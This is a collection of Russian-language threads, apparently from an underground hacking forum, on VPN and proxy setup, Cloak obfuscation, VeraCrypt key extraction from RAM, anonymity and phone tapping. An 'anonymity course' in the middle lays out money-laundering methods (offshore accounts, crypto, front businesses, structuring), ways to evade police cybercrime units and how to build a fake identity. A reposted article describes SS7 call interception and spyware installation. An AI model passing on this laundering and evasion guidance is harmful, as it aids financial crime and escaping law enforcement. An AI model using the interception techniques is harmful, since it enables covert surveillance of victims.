Теперь создаем конфигурационный файл V2Ray (в пункте id вписываем сгенерированный UUID для обоих протоколов):

Code:Copy to clipboard

cat > /etc/v2ray/config.json <<EOF
{
  "inbounds": [
    {
      "port": 9000,
      "protocol": "vmess",
      "settings": {
        "clients": [
          {
            "id": "2aec9185-49a5-4aef-bf7e-1f486a9ac919",
            "level": 1,
            "alterId": 64
          }
        ]
      }
    },
    {
      "port": 9000,
      "protocol": "vless",
      "settings": {
        "clients": [
          {
            "id": "2aec9185-49a5-4aef-bf7e-1f486a9ac919",
            "level": 1
          }
        ],
        "decryption": "none",
        "fallbacks": [
          {
            "dest": 9000
          }
        ]
      },
      "streamSettings": {
        "network": "tcp"
      }
    }
  ],
  "outbounds": [
    {
      "protocol": "freedom",
      "settings": {}
    },
    {
      "protocol": "blackhole",
      "settings": {},
      "tag": "blocked"
    }
  ]
}
EOF

Устанавливаем Docker-контейнер командой:

Code:Copy to clipboard

docker run -d -p 9000:9000 --name v2ray --restart=always -v /etc/v2ray:/etc/v2ray teddysun/v2ray

После этого контейнер работает, проверить работоспособность можно через мобильное приложение V2RayNG (https://github.com/2dust/v2rayNG)

При подключении выбирайте нужный протокол, указывайте название, порт и UUID для подключение, остальные настройки по умолчанию.

В данной инструкции была показана простейшая конфигурация, её можно настроить и более тонко для различных сценариев использования.

Cloak - это тип протокола обфускации, который предназначен для обфускации VPN- и прокси-трафика, что затрудняет обнаружение и блокировку трафика сетевыми администраторами и интернет-провайдерами.

Он работает, используя комбинацию методов, чтобы трафик VPN или прокси выглядел как обычный трафик HTTPS. Во-первых, он шифрует трафик VPN или прокси с помощью шифрования TLS, которое является тем же протоколом шифрования, что и HTTPS. Он также использует технологию фронтирования домена , которая позволяет VPN или прокси-трафику выглядеть так, как будто он идет с легитимного HTTPS- сайта.

Когда пользователь подключается к VPN или прокси-серверу, использующему Cloak, сервер сначала устанавливает TLS-соединение с устройством пользователя. Это начальное соединение используется для обмена ключами и установления зашифрованного канала между двумя устройствами. После установления зашифрованного канала трафик пользователя передается по этому каналу с помощью техники, называемой туннелированием.

В процессе туннелирования трафик пользователя встраивается в HTTP-запросы и отправляется на VPN или прокси-сервер с использованием доменного фронтирования. Таким образом, создается впечатление, что трафик идет с легитимного HTTPS-сайта, что значительно затрудняет обнаружение и блокировку трафика сетевыми администраторами и интернет-провайдерами.

Сравнение этих протоколов и определение того, какой из них лучше использовать, зависит от конкретных случаев использования и индивидуальных предпочтений. Каждый протокол имеет свои сильные и слабые стороны, и выбор лучшего протокола для конкретной ситуации требует глубокого понимания характеристик протокола и требований сети.

Эти протоколы можно совмещать между собой и с популярными VPN-протоколами, такими как Wireguard и OpenVPN, такое решение поможет скрыть факт использования VPN в случаях, если VPN будет заблокирован на уровне протокола.

автор CyberSec
источник RuTOR

Атаки на VeraCrypt, шифрование ОЗУ. Компьютерная криминалистика (форензика)

ID: 676533bbb4103b69df371906
Thread ID: 118430
Created: 2024-07-08T12:26:54+0000
Last Post: 2024-11-19T12:50:04+0000
Author: jaskolka
Prefix: Видео
Replies: 23 Views: 3K

Видео не мое и не является рекламой канала

Достаточно узкая тема, и достаточно интересная, речь о шифрование ОЗУ, способы извлечения ОЗУ с устройств, и извлечение мастер-ключей с ОЗУ.

Также интересно именно то, что автор использует elcomsoft forensic disk decryptor, производители которого, заявили что могут извлекать из ОЗУ мастер- ключи VeraCrypt даже с включенным шифрованием ОЗУ (программным) [https://blog.elcomsoft.com/2021/06/...ng-and-extracting-on-the-fly- encryption-keys/](https://blog.elcomsoft.com/2021/06/breaking-veracrypt- obtaining-and-extracting-on-the-fly-encryption-keys/)

К сожалению, мне лень переписывать все содержимое видео, знаю что многие любят текст и не хотят ходить на ~~youtube~~ хонипот, поэтому специально для Вас я загрузил в качестве 360p на ФО https://send.exploit.in/download/7bd87e2b4817e2ad/#8G-CnJOsnM_FfkEUgVjcYA

![blog.elcomsoft.com](/proxy.php?image=https%3A%2F%2Fblog.elcomsoft.com%2Fwp- content%2Fuploads%2F2021%2F05%2FEFDD-2.18_2_1200x630.jpg&hash=582ffd79a1d20dc79100b80ef85656b3&return_error=1)

[ Breaking VeraCrypt: Obtaining and Extracting On-The-Fly Encryption Keys

](https://blog.elcomsoft.com/2021/06/breaking-veracrypt-obtaining-and- extracting-on-the-fly-encryption-keys/)

Released back in 2013, VeraCrypt picks up where TrueCrypt left off. Supporting more encryption algorithms, more hash functions and a variable number of hash iterations, VeraCrypt is the default choice for the security conscious. VeraCrypt has no known weaknesses except one: once the encrypted disk i

![blog.elcomsoft.com](/proxy.php?image=https%3A%2F%2Fblog.elcomsoft.com%2Fwp- content%2Fthemes%2Felcomsoft_corp%2Ficon%2Ffavicon-32x32.png%3Fv%3DXBBkp4WYXz&hash=5ab03f6f81d465237178b92150a6e409&return_error=1) blog.elcomsoft.com

Forensic Disk Decryptor 2.18 с поддержкой ключей VeraCrypt в оперативной памяти | Elcomsoft Co.Ltd.

В обновлении Elcomsoft Forensic Disk Decryptor 2.18 добавлена поддержка извлечения ключей шифрования последних версий VeraCrypt из оперативной памяти компьютеров. Наш продукт – единственное решение на рынке, поддерживающее извлечение из памяти ключей шифрования новых версий VeraCrypt.

www.elcomsoft.ru

Безопасное хранение сид фраз?

ID: 676533bbb4103b69df371917
Thread ID: 68409
Created: 2022-06-09T16:39:02+0000
Last Post: 2024-10-26T11:37:58+0000
Author: woksy
Replies: 39 Views: 3K

Добрый день, какие у вас есть идеи где и как безопасно хранить сид фразы от кошелька? Ситуация такая что криптой не планирую пользоваться в ближайшее время. Пока разделил сид фразу на 2, записал на листочке и спрятал дома. Но все таки есть риск что дом может сгореть, либо что то случиться с листком и тд

хочеться иметь возможность если что ввести фразу из любого места поэтому думаю как безопасно хранить в облаке.
из вариантов
-менеджер паролей (ввел логин:пасс и получил доступ к сид фразе)
-создать почту, к примеру протонмаил и скинуть туда фото сид фразы
Но тут тоже есть свои большие минусы и риски.
В аппаратных кошельках не вижу смысла

Смена Ip

ID: 676533bbb4103b69df371925
Thread ID: 9307
Created: 2006-06-19T11:31:24+0000
Last Post: 2024-09-29T17:56:26+0000
Author: Gamers
Replies: 4 Views: 3K

Скажите есть такая прога которая внешку временно делает на Ip типо 192.168...?

Полный курс по анонимности

ID: 676533bbb4103b69df371928
Thread ID: 114452
Created: 2024-05-13T14:08:46+0000
Last Post: 2024-09-25T01:37:24+0000
Author: Giveeee
Prefix: Статья
Replies: 15 Views: 3K

Автор статьи: Giveeee / KillPin Darknet
Статья для xss
Курс по анонимности
1. Анонимность в телеграм
Для хорошей анонимности в данной соц сети вам потребуется несколько вещей:

1. Отдельное устройство ( желательно пк с ОС Linux, Parrot, Qubes OS ) либо телефон с ОС LineageOS / ubuntu )

2. VPN ( из качественных - Mullvad, но лучше создать свой.

Как создать свой VPN:

1. Регистрируем VPS-сервер

VPS (virtual private server) или VDS (virtual dedicated server) — услуга предоставления в аренду так называемого виртуального выделенного сервера. В плане управления операционной системой по большей части она соответствует физическому выделенному серверу. В частности: root-доступ, собственные IP-адреса, порты, правила фильтрования и таблицы маршрутизации.
Виртуальные выделенные серверы (VPS)

VPS — это виртуальные серверы, которые работают на одном физическом сервере. Они предоставляют пользователям полный и независимый контроль, как обычные выделенные серверы.

Каждый VPS имеет собственные ресурсы, конфигурацию и администрирование. Часто на VPS устанавливаются свободные операционные системы, такие как Unix и Linux.

Создание VPN-сервера на VPS

1. Арендуйте VPS-сервер с дистрибутивом Ubuntu на специализированном ресурсе, таком как Vultr.com или Msk.host.

2. Подключитесь к серверу по SSH с помощью PuTTY или аналогичного инструмента.

3. Настройте OpenVPN с помощью команд:

apt-get update && apt-get upgrade
apt-get install git
cd /root
git clone https://github.com/Nyr/openvpn-install.git
cd openvpn-install
chmod +x openvpn-install.sh
./openvpn-install.sh

4. Перенесите файл конфигурации VPN (.ovpn) из домашней директории сервера на устройство, с которого хотите подключиться к VPN.

5. Установите OpenVPN на устройство для подключения к VPN-серверу с помощью файла конфигурации (.ovpn).

3. Создание аккаунта.
Нужно приобрести физ номер, на который мы будем регистрировать телеграм.
При регистрации нужно придумать nickname, ставим слово на английском, никак не относящееся ни к чему, никнеймы, которые будут пробивать 100 лет - Dragon, Kill, Staff ( Пример никнеймов, не относящихся ни к чему )
Когда создали аккаунт, в настройках конфиденциальности запретите находить вас по номеру, уберите ссылку на аккаунт при пересылке сообщения.
И запретите возможность добавлять вас в группы, так как один из способов сноса аккаунтов - добавление в канал с 18+ контентом и подача жалобы.

4. **Как только вы создали и настроили телеграм аккаунт, вы должны придерживаться некоторых правил, вот одни из них:

1.** Не использовать никаких ботов
2. Не покупать телеграм премиум
3. Не заходить в чаты, связанные с тобой
4. Не открывать ссылки и желательно картинки

2. Отмыв денег
Простыми словами «отмывание денег» – это их легализация. Люди создают фиктивные документы, организации и предприятия для видимости официального дохода.
Суть отмывания денег – сокрытие действительного источника заработка.
Отмытие денежных средств осуществляется в три этапа:

Отслоение. Изначально деньги, полученные незаконным способом, скрывают от их реального источника. Для этого средства выводятся за границу, переводятся на счета физических или юридических лиц.
Размещение. Средства любыми доступными путями внедряются в легальный денежный поток. Как правило, на данном этапе у человека уже есть фиктивное подтверждение источника их заработка.
Интеграция. Это завершающий этап, когда создается видимость правомерного обладания богатством. Владелец денежных средств может свободно снимать их, переводить на любые счета, приобретать различные предметы, недвижимость.

Отмывание денег через оффшоры

Деньги выводятся через банковские счета в странах без валютного контроля, обеспечивая анонимность.

Транзакции могут использоваться для инвестиций или хранения в других странах.

Отмывание денег через криптовалюты

Биткоин и другие криптовалюты не регулируются и позволяют осуществлять анонимные транзакции ( блокчейн открыт для всех, но можно использовать ETH, USDT, XRM )

Деньги переводятся с кошельков на банковские счета и конвертируются в обычную валюту.

Отмывание денег через бизнес

Преступники открывают фиктивные предприятия, чтобы вводить незаконные средства в оборот.

Отслеживание незаконных денег затруднено из-за наличия реальных денежных потоков от клиентов.

Отмывание денег через структурирование капитала

Крупные суммы разбиваются на более мелкие, которые не привлекают внимания налоговых органов.

Деньги переводятся посредникам, которые затем снимают их и передают наличными, удерживая комиссию.

3. Анонимные ОС на пк и телефон
Операционные системы на пк:

Qubes OS -

Ориентированная на безопасность настольная операционная система, которая призвана обеспечить безопасность через изоляцию. Виртуализация осуществляется на базе Xen.

Whonix -

Лучше взять проверенное готовое решение, а именно дистрибутив TAILS. Он включает в себя множество преднастроенных приложений, корректно настроенный Tor и брандмауэр, так что в целом это достаточно надежная в плане сохранения анонимности и приватности система

Tails -

Эта OS направлена на сохранение вашей конфиденциальности и анонимности поможет вам использовать интернет анонимно и обходить цензуру — все подключения вынуждены проходить через сеть TOR, а также не оставлять следов на компьютере, который вы используете и использовать новейшие криптографические инструменты для шифрования ваших файлов, электронной почты, обмена мгновенными сообщениями и скрытия всех файлов и каталогов на электронном носителе.

Debian -

это операционная система с открытым исходным кодом, которая состоит из свободного программного обеспечения. На данный момент это самая популярная ОС среди Linux-продуктов. Она стала основой для многих других дистрибутивов, например, Ubuntu и Kali Linux

Kali Linux -

это дистрибутив Linux на основе Debian с открытым исходным кодом, предназначенный для расширенного тестирования на проникновение, проверки уязвимостей, аудита безопасности систем и сетей. Дистрибутив используют многие специалисты информационной безопасности: сетевые архитекторы и администраторы, инженеры-криминалисты, директора по информационной безопасности, пентестеры.

4. Всё об VPN сервисах

Если меня спросят каким VPN пользоваться - я смело отвечу Mullvad, так как данный VPN не сливает и не сохраняет логи, также в телеграм недавно вышел проект от шестого соруководителя рампа - Horus ( в поиске в тг вводите Horus Team, там будет ссылка на бота, они сохраняют минимум логов, есть пробный период, впн нужен для того, чтобы твой трафик проходил не через твоё соединение, если вы сидите в Торе, провайдер видит использование тора, а впн даёт избежать этого.

5. Шифрование и контроль трафика
Linux предоставляет огромный набор функций для маршрутизации и инструментов ее конфигурирования. Опытные сисадмины знают об этом и используют арсенал Linux на полную катушку. Но и многие даже продвинутые пользователи не догадываются, сколько удобства могут принести все эти замечательные возможности. Сегодня мы создадим таблицы маршрутизации и опишем правила прохода по ним, а также автоматизируем администрирование этих таблиц.

Инструменты:

Iptables

Командный инструмент для управления файрволом Linux.

Iproute2

Набор утилит для управления сетевыми устройствами в Linux.

IPSet

Инструмент для создания и управления списками IP-адресов и портов для использования в файрволах.

Stunnel

Инструмент для шифрования незащищенных соединений, не поддерживающих TLS или SSL.

OpenVPN

VPN-сервер с шифрованием на базе OpenSSL.

Поддерживает различные платформы и может работать через прокси и сетевые фильтры.

6. Анонимность в сети
Риски, связанные с интернет-провайдерами и вредоносными программами

Интернет-провайдеры:

Отслеживают вашу онлайн-активность и собирают ваши данные для коммерческих целей.

Могут замедлять передачу данных из торрент-сетей и шифрованный трафик.

Могут быть обязаны по закону передавать ваши данные спецслужбам.

Троянские ботнеты:

Наборы вредоносных программ, которые заражают компьютеры и объединяют их в сети.

Собирают ваши данные, такие как пароли, посещенные веб-сайты и файлы.

Могут использовать зараженные компьютеры для рассылки спама, проведения хакерских атак и других нелегальных действий.

Могут продавать ваши данные спецслужбам, которые могут использовать их для слежки или других целей.

Эти действия подвергают вас риску:

Кражи личной информации и паролей.

Вовлечения в незаконную деятельность, такую как взлом чужих компьютеров.

Передачи ваших данных спецслужбам.

Отдел К подразделения МВД

Отдел К занимается раскрытием различных преступлений в сети Интернет, в некоторых случаях использует СОРМ для ОРМ (Оперативно Розыскных Мероприятий), но как правило их клиенты это хакеры, кардеры спецы по граббингу, пираты и т.п. Но это эти подразделение тоже надо иметь ввиду, рассматривать защиту от них подробно я не буду отдельно, поскольку если вы принимает меры против СОРМ, то автоматом и принимает меры против отдела К. Отдел К это только исполнители которые приходят уже по известным данным, а всю информацию им предоставляет СОРМ.

Прокси

Что такое прокси-сервер?

Прокси-сервер (от англ. proxy право пользоваться от чужого имени) удаленный компьютер, который, при подключении к нему вашей машины, становится посредником для выхода абонента в интернет. Прокси передает все запросы программ абонента в сеть и получив ответ, отправляет его обратно абоненту. Прокси-сервер также имеет свой ip-адрес. Как мы уже упомянули, подключившись к прокси, вы передаете все запросы в интернет через него, при этом проверка показывает ip прокси-сервера, а вы остаетесь анонимным.

Типы прокси-серверов:

HTTP прокси

Самый распространенный тип прокси.

Работает по протоколу HTTP.

Если программа не указывает тип прокси, то обычно используется HTTP прокси.

HTTPS прокси (SSL прокси)

То же, что и HTTP прокси, но с поддержкой шифрования по протоколу SSL.

IRC прокси (баунсер, bnc)

Используется для скрытия реального IP-адреса в IRC-сетях.

Позволяет оставаться на канале даже после отключения IRC-клиента.

SOCKS прокси

Может работать с любыми протоколами.

Сложнее в использовании, чем другие типы прокси.

Анонимны по своей природе.

CGI прокси (анонимайзеры)

Работает только через браузер.

Просты в использовании, но имеют ограниченные возможности.

Могут блокировать cookie и рекламу.

FTP прокси

Узкоспециализированный тип прокси, работающий только с FTP-серверами.

Часто включается в состав HTTP-прокси.

Gopher прокси

Малораспространенный тип прокси, работающий по протоколу Gopher (предшественнику WWW).

MySQL прокси

Новый тип прокси, специализирующийся на взаимодействии с серверами MySQL.

Анонимайзеры

Анонимайзеры — это сервисы, которые позволяют скрыть ваш реальный IP-адрес, защищая вашу онлайн-активность от отслеживания. Они действуют как посредники между вашим компьютером и веб-сайтами, которые вы посещаете.

Где взять анонимайзеры и насколько они надежны

Anonymization.Org Бесплатный анонимайзер, который блокирует загрузку файлов cookie и выполнение JavaScript. Наиболее надежный вариант среди перечисленных.

Proxify.com Поддерживает протокол шифрования SSL, что обеспечивает более высокий уровень анонимности. Однако бесплатная версия сервиса содержит навязчивую рекламу.

Надежность анонимайзеров

Анонимайзеры не являются полностью надежными средствами защиты от слежки. Они могут не выдержать усилий специальных служб по раскрытию вашей личности. Тем не менее, они могут служить дополнительным слоем защиты и затруднить отслеживание вашей онлайн-активности.

7. Создание Фейк личности
Грубо говоря вы должны создать второго человека, обязательно надо следить за тем, чтобы ничего в ваших личностях не сходилось, полностью новая манера общения, новые проекты, никак не связанные друг с другом, новая сфера деятельности, новые связи.

При создании нового ника убедитесь, что он никак не схож со старым, чтобы по нему не могли найти вас.
Создайте новый адрес электронной почты, не связанный с вашим реальным именем или адресом.
Создание второй личности может потребовать значительных усилий и времени.
Важно быть осторожным и следить за тем, чтобы ваша новая личность не была раскрыта.

Прослушка телефона, обсуждение

ID: 676533bbb4103b69df37192e
Thread ID: 27035
Created: 2018-12-25T21:54:56+0000
Last Post: 2024-09-17T19:42:09+0000
Author: Hide
Replies: 11 Views: 3K

Мобильный телефон — это универсальный жучок, который человек постоянно и добровольно носит с собой. Идеальное устройство для круглосуточной слежки и прослушивания. К радости спецслужб и хакеров, большинство людей даже не подозревают, насколько легко подключиться к каналу связи и прослушать их разговоры, прочитать СМС и сообщения в мессенджерах.
![](/proxy.php?image=https%3A%2F%2Fcdn.lifehacker.ru%2Fwp- content%2Fuploads%2F2017%2F01%2FSnimok_1485209726-e1485209771417.jpg&hash=f08c8861441cb6453266265c6208af54)
JET-связь
Сим-карты JET обеспечивают безопасную и безлимитную связь по всему миру.
1. СОРМ — официальная прослушка
Самый явный способ — официальная прослушка со стороны государства.
Во многих странах мира телефонные компании обязаны обеспечить доступ к линиям прослушивания телефонных каналов для компетентных органов. Например, в России на практике это осуществляется технически через СОРМ — систему технических средств для обеспечения функций оперативно-розыскных мероприятий.
Каждый оператор обязан установить на своей АТС интегрированный модуль СОРМ.

![](/proxy.php?image=https%3A%2F%2Fcdn.lifehacker.ru%2Fwp- content%2Fuploads%2F2017%2F01%2Fimage02_1485208413.jpg&hash=59f24377a776c135caa3219f0bc8e989)

Если оператор связи не установил у себя на АТС оборудование для прослушки телефонов всех пользователей, его лицензия в России будет аннулирована. Аналогичные программы тотальной прослушки действуют в Казахстане, на Украине, в США, Великобритании (Interception Modernisation Programme, Tempora) и других странах.
Продажность государственных чиновников и сотрудников спецслужб всем хорошо известна. Если у них есть доступ к системе в «режиме бога», то за соответствующую плату вы тоже можете получить его. Как и во всех государственных системах, в российском СОРМ — большой бардак и типично русское раздолбайство. Большинство технических специалистов на самом деле имеет весьма [низкую квалификацию](http://rabkor.ru/columns/debates/2015/11/25/motherland- will-hear-you/), что позволяет несанкционированно подключиться к системе незаметно для самих спецслужб.

Операторы связи не контролируют, когда и кого из абонентов слушают по линиям СОРМ. Оператор никак не проверяет, есть ли на прослушку конкретного пользователя санкция суда.

«Берёте некое уголовное дело о расследовании организованной преступной группы, в котором перечислены 10 номеров. Вам надо прослушать человека, который не имеет отношения к этому расследованию. Вы просто добиваете этот номер и говорите, что у вас есть оперативная информация о том, что это номер одного из лидеров преступной группы», — говорят знающие люди с сайта «Агентура.ру».
Таким образом, через СОРМ вы можете прослушать кого угодно на «законных» основаниях. Вот такая защищённая связь.
2. Прослушка через оператора
Операторы сотовой связи вообще безо всяких проблем смотрят список звонков и историю перемещений мобильного телефона, который регистрируется в различных базовых станциях по своему физическому расположению. Чтобы получить записи звонков, как у спецслужб, оператору нужно подключиться к системе СОРМ.
По [новым российским законам](http://agsmart.net/redir/clickGate.php?u=RGm1L5B5&m=1&p=RMh39rQD9m&t=blM8Ym94&st=&s=&splash=0&abp=1&url=http%3A%2F%2Fasozd2.duma.gov.ru%2Fmain.nsf%2F%2528Spravka%2529%3FOpenAgent%26RN%3D1039101-6&r=https%3A%2F%2Flifehacker.ru%2F2017%2F01%2F25%2F9-sposobov- proslushat-telefon%2F) операторы будут обязаны хранить аудиозаписи разговоров всех пользователей от полугода до трёх лет (о точном сроке сейчас договариваются). Закон вступает в силу с 2018 года.
3. Подключение к сигнальной сети SS7
Зная номер жертвы, возможно прослушать телефон, подключившись к сети оператора сотовой сети через [уязвимости в протоколе сигнализации SS7](http://blog.ptsecurity.com/2014/08/cell-phone-tapping-how-it-is-done- and.html) (Signaling System № 7).
![](/proxy.php?image=https%3A%2F%2Fcdn.lifehacker.ru%2Fwp- content%2Fuploads%2F2017%2F01%2Fimage01_1485208412.png&hash=213046feb3f61c8ad234d3ccf457313b)
Специалисты по безопасности описывают эту технику таким образом.
Атакующий внедряется в сеть сигнализации SS7, в каналах которой отправляет служебное сообщение Send Routing Info For SM (SRI4SM), указывая в качестве параметра телефонный номер атакуемого абонента А. В ответ домашняя сеть абонента А посылает атакующему некоторую техническую информацию: IMSI (международный идентификатор абонента) и адрес коммутатора MSC, который в настоящий момент обслуживает абонента.
Далее атакующий с помощью сообщения Insert Subscriber Data (ISD) внедряет в базу данных VLR обновлённый профиль абонента, изменяя в нем адрес биллинговой системы на адрес своей, псевдобиллинговой, системы. Затем, когда атакуемый абонент совершает исходящий вызов, его коммутатор обращается вместо реальной биллинговой системы к системе атакующего, которая даёт коммутатору директиву перенаправить вызов на третью сторону, опять же подконтрольную злоумышленнику. На этой третьей стороне собирается конференц-вызов из трёх абонентов, два из которых реальные (вызывающий А и вызываемый В), а третий внедрён злоумышленником несанкционированно и может слушать и записывать разговор.
Схема вполне рабочая. Специалисты говорят, что при разработке сигнальной сети SS7 в ней не было заложено механизмов защиты от подобных атак. Подразумевалось, что эта система и так закрыта и защищена от подключения извне, но на практике злоумышленник может найти способ присоединиться к этой сигнальной сети.
К сети SS7 можно подключиться в любой стране мира, например в бедной африканской стране, — и вам будут доступны коммутаторы всех операторов в России, США, Европе и других странах. Такой метод позволяет прослушать любого абонента в мире, даже на другом конце земного шара. Перехват входящих СМС любого абонента тоже осуществляется элементарно, как и перевод баланса через USSD-запрос (подробнее смотрите в выступлении Сергея Пузанкова и Дмитрия Курбатова на хакерской конференции PHDays IV).
4. Подключение к кабелю
Из документов Эдварда Сноудена стало известно, что спецслужбы не только «официально» прослушивают телефоны через коммутаторы связи, но и подключаются [напрямую к оптоволокну](https://www.theguardian.com/uk/2013/jun/21/gchq- cables-secret-world-communications-nsa), записывая весь трафик целиком. Это позволяет прослушивать иностранных операторов, которые не дают официально установить прослушивающее оборудование на своих АТС.
Вероятно, это довольно редкая практика для международного шпионажа. Поскольку на АТС в России и так повсеместно стоит прослушивающее оборудование, нет особой необходимости в подключении к оптоволокну. Возможно, такой метод имеет смысл применять только для перехвата и записи трафика в локальных сетях на местных АТС. Например, для записи внутренних переговоров в компании, если они осуществляются в рамках локальной АТС или по VoIP.
5. Установка шпионского трояна
На бытовом уровне самый простой способ прослушать разговоры пользователя по мобильному телефону, в Skype и других программах — просто установить троян на его смартфон. Этот метод доступен каждому, здесь не требуются полномочия государственных спецслужб или решение суда.
За рубежом правоохранительные органы часто закупают специальные трояны, которые используют никому не известные 0day-уязвимости в Android и iOS для установки программ. Такие трояны по заказу силовых структур разрабатывают компании вроде Gamma Group (троян FinFisher).
Российским правоохранительным органам ставить трояны нет особого смысла, разве только требуется возможность активировать микрофон смартфона и вести запись, даже если пользователь не разговаривает по мобильному телефону. В других случаях с прослушкой отлично справляется СОРМ. Поэтому российские спецслужбы не слишком активно внедряют трояны. Но для неофициального использования это излюбленный хакерский инструмент.

Жёны шпионят за мужьями, бизнесмены изучают деятельность конкурентов. В России троянский софт повсеместно используется для прослушки именно частными клиентами.

Троян устанавливается на смартфон различными способами: через поддельное программное обновление, через электронное письмо с фальшивым приложением, через уязвимость в Android или в популярном программном обеспечении типа iTunes.
Новые уязвимости в программах находят буквально каждый день, а потом очень медленно закрывают. Например, троян FinFisher устанавливался через [уязвимость в iTunes](http://www.spiegel.de/international/germany/troublesome-trojans- firm-sought-to-install-spyware-via-faked-itunes-updates-a-799259.html), которую Apple не закрывала с 2008-го по 2011-й. Через эту дыру можно было установить на компьютер жертвы любой софт от имени Apple.
Возможно, на вашем смартфоне уже установлен такой троян. Вам не казалось, что аккумулятор смартфона в последнее время разряжается чуть быстрее, чем положено?
6. Обновление приложения
Вместо установки специального шпионского трояна злоумышленник может поступить ещё грамотнее: выбрать приложение, которое вы сами добровольно установите на свой смартфон, после чего дадите ему все полномочия на доступ к телефонным звонкам, запись разговоров и передачу данных на удалённый сервер.
Например, это может быть популярная игра, которая распространяется через «левые» каталоги мобильных приложений. На первый взгляд, обычная игра, но с функцией прослушки и записи разговоров. Очень удобно. Пользователь своими руками разрешает программе выходить в интернет, куда она отправляет файлы с записанными разговорами.
Как вариант, вредоносная функциональность приложения может добавиться в виде обновления.
7. Поддельная базовая станция
![](/proxy.php?image=https%3A%2F%2Fcdn.lifehacker.ru%2Fwp- content%2Fuploads%2F2017%2F01%2Fimage03_1485208415.png&hash=7bd93a66018f62e657a1cabc370004ac)
Поддельная базовая станция имеет более сильный сигнал, чем настоящая БС. За счёт этого она перехватывает трафик абонентов и позволяет манипулировать данными на телефоне. Известно, что фальшивые базовые станции широко используются правоохранительными органами за рубежом.
В США популярна модель фальшивой БС под названием StingRay.

![](/proxy.php?image=https%3A%2F%2Fcdn.lifehacker.ru%2Fwp- content%2Fuploads%2F2017%2F01%2Fimage00_1485208411-e1485208603574-630x450.jpg&hash=f4830c1f2ea849f2ffbd0f163731565c)
[![](/proxy.php?image=https%3A%2F%2Fcdn.lifehacker.ru%2Fwp- content%2Fuploads%2F2017%2F01%2Fimage00_1485208411-e1485208603574-630x450.jpg&hash=f4830c1f2ea849f2ffbd0f163731565c)](https://cdn.lifehacker.ru/wp- content/uploads/2017/01/image00_1485208411-e1485208603574.jpg)
![](/proxy.php?image=https%3A%2F%2Fcdn.lifehacker.ru%2Fwp- content%2Fuploads%2F2017%2F01%2Fimage00_1485208616-e1485208632671-630x450.jpg&hash=96400cf05df7e273e990ac63eb7aa9f4)
[![](/proxy.php?image=https%3A%2F%2Fcdn.lifehacker.ru%2Fwp- content%2Fuploads%2F2017%2F01%2Fimage00_1485208616-e1485208632671-630x450.jpg&hash=96400cf05df7e273e990ac63eb7aa9f4)](https://cdn.lifehacker.ru/wp- content/uploads/2017/01/image00_1485208616-e1485208632671.jpg)

И не только правоохранительные органы используют такие устройства. Например, коммерсанты в Китае часто применяют фальшивые БС для массовой рассылки спама на мобильные телефоны, которые находятся в радиусе сотен метров вокруг. Вообще в Китае производство «фальшивых сот» поставлено на поток, так что в местных магазинах не проблема найти подобный девайс, собранный буквально на коленке.
8. Взлом фемтосоты
В последнее время в некоторых компаниях используются фемтосоты — маломощные миниатюрные станции сотовой связи, которые перехватывают трафик с мобильных телефонов, находящихся в зоне действия. Такая фемтосота позволяет записывать звонки всех сотрудников компании, прежде чем перенаправлять звонки на базовую станцию сотовых операторов.
Соответственно, для прослушки абонента требуется установить свою фемтосоту или взломать оригинальную фемтосоту оператора.
9. Мобильный комплекс для дистанционной прослушки
В данном случае радиоантенна устанавливается недалеко от абонента (работает на расстоянии до 500 метров). Направленная антенна, подключённая к компьютеру, перехватывает все сигналы телефона, а по окончании работы её просто увозят.
В отличие от фальшивой фемтосоты или трояна, здесь злоумышленнику не нужно заботиться о том, чтобы проникнуть на место и установить фемтосоту, а потом убрать её (или удалить троян, не оставив следов взлома).
Возможностей современных ПК достаточно, чтобы записывать сигнал GSM на большом количестве частот, а затем взломать шифрование с помощью радужных таблиц (вот описание техники от известного специалиста в данной области Карстена Ноля).
Если вы добровольно носите с собой универсальный жучок, то автоматически собираете обширное досье на самого себя. Вопрос только в том, кому понадобится это досье. Но если понадобится, то получить его он сможет без особого труда.

Источник: https://lifehacker.ru/9-sposobov-proslushat-telefon/

Давайте вместе сформируем ТЗ на услуги будущего сервиса продажи VPN

ID: 676533bbb4103b69df371944
Thread ID: 111437
Created: 2024-03-27T14:36:58+0000
Last Post: 2024-07-27T10:48:21+0000
Author: Mikeclover
Replies: 34 Views: 3K

Все мы живем в такое время, когда доверять нельзя никому! Кто не согласен - сразу ставьте дизлайк. Именно поэтому любая выполненная работа требует проверки со стороны заказчика.
Сегодня пообщался с человеком, который как и многие обещает цитирую _" самый конфиденциальный и надёжный)" _VPN . Однако, после ряда вопросов остались некоторые сомнения.
Думаю. что проблема заключается в том, что нет грамотного ТЗ на подобные услуги. Таким образом предлагаю их сформировать, иначе каждый сам себе режиссер и "Я автор - я так вижу!!!".

Анонимность и безопасность Windows 10

ID: 676533bbb4103b69df371968
Thread ID: 59125
Created: 2021-11-21T23:52:17+0000
Last Post: 2024-05-22T13:38:31+0000
Author: chillco
Replies: 25 Views: 3K

Здравствуйте. В основном использую линукс, из него гараздо легче сделать безопасную систему, настроив файервол и отключив всякие автоматические обновления, что бы не было лишних запросов в интернет. Но сейчас появилась необходимость использовать Windows 10. Сразу после установки системы увидел запущенный процесс для телеметрии, и решил что так оставлять это нельзя.
На просторах интернета я видел много статей по поводу отключения слежки в Windows 10, и даже есть несколько различных утилит, но сперва я хотел бы услышать мнение людей которые давно используют Windows 10 как анонимную ОС. Как вы настраивали свою Windows 10? Какие сервисы стоит отключать? Используете ли вы какие то утилиты для отключения слежки? Быть может, есть хороший мануал?
Буду рад любой помощи!

Анализ дампа оперативной памяти

ID: 676533bbb4103b69df371982
Thread ID: 109054
Created: 2024-02-26T04:45:30+0000
Last Post: 2024-04-03T09:45:17+0000
Author: defaultuser0
Prefix: Статья
Replies: 34 Views: 3K

Работает Криминалист!
Снимаем и Анализируем дамп оперативной памяти

Авторство: defaultuser0

Источник: xss.is

DALL·E-2024-02-26-01.35.jpg

Приветствую форумчане! Продолжаю делится своими знаниями преобретенными работая специалистом по информационной безопасности. В этой статье я хочу вам поведовать о таком душном процессе как снятие и анализ оперативой памяти. У вас может появится резонный вопрос - зачем, для чего, почему. Попробую обрисовать вам картину как это происходит в боевых условиях. Я возьму боевой вирус и поражу свою Виртуалку им, после я покажу процесс анализа с изъятием образа вредоноса с дампа оперативной памяти! Как всегда теория + практика.

Основы и принципы снятия и анализа дампа оперативной памяти

